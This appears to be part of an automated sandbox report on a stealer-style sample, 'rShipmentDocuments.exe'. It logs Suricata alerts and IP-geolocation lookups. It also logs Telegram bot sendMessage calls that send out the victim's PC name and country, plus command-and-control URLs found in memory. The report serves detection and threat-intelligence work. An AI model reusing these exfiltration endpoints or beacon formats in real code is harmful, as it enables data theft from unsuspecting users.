                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: unknownFTP traffic detected: 185.230.141.85:21 -> 192.168.2.4:49204 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 11 Oct 2024 07:35:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 11 Oct 2024 07:35:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000031E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4153230560.00000000068E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c62
                Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1765638038.0000000002867000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000000.00000002.1732739844.0000000005DA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enp
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
